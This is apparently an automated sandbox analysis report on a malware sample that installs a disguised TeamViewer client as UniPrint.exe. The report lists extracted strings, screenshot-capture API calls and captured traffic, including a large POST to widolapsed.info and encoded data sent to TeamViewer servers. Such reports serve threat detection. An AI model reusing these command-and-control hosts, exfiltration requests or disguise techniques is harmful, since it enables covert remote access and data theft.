Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://go.teamviewer.comn0
Source: UniPrint.exe, 00000005.00000003.710224733.00000000057D9000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001;
Source: UniPrint.exe, 00000005.00000003.709879277.00000000057F0000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001ndows.Phot
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001s
Source: UniPrint.exe, 00000005.00000002.1073157453.0000000000B65000.00000004.00000020.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002u
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=100000026
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.710194245.00000000057D4000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=100000023v
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713534320.0000000005721000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002321935-2125563209-405306
Source: UniPrint.exe, 00000005.00000002.1073179417.0000000000B68000.00000004.00000020.sdmp | String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5Mko
Source: UniPrint.exe, 00000005.00000002.1073127658.0000000000B5D000.00000004.00000020.sdmp | String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6s
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713565888.000000000576A000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713161991.00000000057D0000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeq
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp | String found in binary or memory: http://mastr13.teamv
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp | String found in binary or memory: http://mastr13.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=2
Source: wogZe27GBB.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: wogZe27GBB.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wogZe27GBB.exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: wogZe27GBB.exe | String found in binary or memory: http://ocsp.digicert.com0O
Source: wogZe27GBB.exe | String found in binary or memory: http://ocsp.sectigo.com0
Source: UniPrint.exe, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.TeamViewer.com
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.TeamViewer.com/download
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.TeamViewer.com/help
Source: wogZe27GBB.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/termsofservice
Source: nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp | String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp | String found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000010.00000003.794457434.00000217C6F81000.00000004.00000001.sdmp | String found in binary or memory: https://displaycatalog.m(
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp | String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: wogZe27GBB.exe | String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp | String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/8C631A8/ELBASE.dll.mui01
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/B8C631A8/
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/B8C631A8/(c~
Source: UniPrint.exe, 00000005.00000003.855571733.00000000057D3000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/B8C631A8/.i
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/B8C631A8/8
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/B8C631A8/B
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/B8C631A8/ELBASE.dll.mui01
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/TTP-Out)LMEMX
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/apsed.info/qWave
Source: wogZe27GBB.exe | String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/info/privacy
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000002.1073981229.0000000002740000.00000004.00000001.sdmp | String found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: svchost.exe, 00000010.00000003.797707479.00000217C6FB0000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.797621613.00000217C6F5E000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: UniPrint.exe, 00000005.00000002.1072984731.0000000000B00000.00000004.00000020.sdmp | String found in binary or memory: https://www.verisign.c
Source: unknown | HTTP traffic detected:
  POST /B8C631A8/ HTTP/1.1
  Content-Length: 85991
  Content-Type: multipart/form-data; boundary=--------988836371
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: widolapsed.info
  Connection: Close
  Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C5900 GetProcessHeap,GetProcessHeap,HeapAlloc,HttpQueryInfoW,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,RtlMoveMemory,InternetReadFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: global traffic | HTTP traffic detected:
  GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: 188.172.235.146
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: 188.172.235.146
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C6B70 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectW,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,
Source: wogZe27GBB.exe, 00000000.00000002.687265368.000000000079A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
